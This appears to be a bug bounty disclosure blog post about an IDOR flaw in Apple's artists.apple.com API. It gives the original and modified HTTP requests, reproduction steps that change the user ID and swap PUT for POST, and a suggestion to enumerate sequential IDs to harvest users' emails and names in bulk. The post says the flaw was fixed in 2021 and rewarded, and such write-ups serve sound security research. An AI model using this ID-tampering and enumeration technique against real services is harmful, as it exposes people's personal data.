PII Disclosure of all Apple Accounts and Unauthorised add artist account in any victim appleID account [IDOR]
Apple Inc. is an American multinational technology company headquartered in Cupertino, California. As of March 2023, Apple is the world's biggest company by market capitalization, and with US$394.3 billion the largest technology company by 2022 revenue.
Technical Details of the Bug :
#Impact :
1.PII disclosure for mass Apple users
2.Add artist account into any Apple user ID remotely.
3.add Any AppleID user as a member of your artist account
#Effected Service :
##Description of the issue :
In the Artist account you can add any user as a member into your account.There is a API request of editing the current user.
If you change the Apple user ID to any user ID on Apple , the associated account will be directly added into your artist account.
Once the user is added into your account you can view the PII information like Email Address , First name and Last name of the user.
I am mentioning the technical details below.
#Original HTTP Request of Edit the Current user :
```
PUT /api/profiles/artists/
Host: artists.apple.com
Cookie: [Cookies]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://artists.apple.com/a/
X-Requesting-App: Apple Music Artists Web v2
X-Requested-By: 1058da2bea47cd57ffc64d4adcb079
Content-Type: application/x-www-form-
Origin: https://artists.apple.com
Content-Length: 203
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
email=&relationship=manager&
```
There are.2 changes you have to make for successful attack.
1.Change the Apple_User_ID to any User_ID on apple .
2.Change the Request method to POST.
#Vulnerable HTTP Request :
```
POST /api/profiles/artists/
Host: artists.apple.com
Cookie: [Cookies]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://artists.apple.com/a/
X-Requesting-App: Apple Music Artists Web v2
X-Requested-By: 1058da2bea47cd57ffc64d4adcb079
Content-Type: application/x-www-form-
Origin: https://artists.apple.com
Content-Length: 203
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
email=&relationship=manager&
```
##Mass Attack :
Since the Apple User ID is numeric and incremental value , it is easy for attacker to carry out brute force attack to get PII information of mass
Apple users.
##Steps to reproduce :
For this attack you will need Attacker working Artist account.
1.Login to https://artists.apple.com from Attacker account.
2.Now select your artist and go to manage section.
3.Here you can add new users.
4.Add a test user and verify the test account.
5.Now test account will be a member of your artist account.
6.Now from Attacker account edit the test user from users section in manage.
7.save the user and intercept the request in proxy tool like burp suite.
8.You will notice that the request would look something like above mentioned first request(Original request).
9.Now change the Apple_User_ID value to any apple user ID(victim user ID) and Change the Request method to "POST" from "PUT".
10.Send the request to server and you will notice that Victim user will be added into your account.
11.This will also disclose the PII information fo Victim account like Email Address , First name , Last name etc.
12.Now if you login from victim account , you will see attacker artist added into victim account.
#Video POC :
I am providing a video POC for this . I have created password protected Vimeo video for this issue.
Link : https://vimeo.com/634650310
Password : appleprivatepoc007@
Timeline :
Oct 18th 2021: Report send to Apple product Security Team through Email.
Oct 19th 2021: Report Accepted and Triaged.
Nov 11th 2021: Complete issue was resolved and confirmed.
Jan 29th 2022: 6500$ Bounty Rewarded
Comments
Post a Comment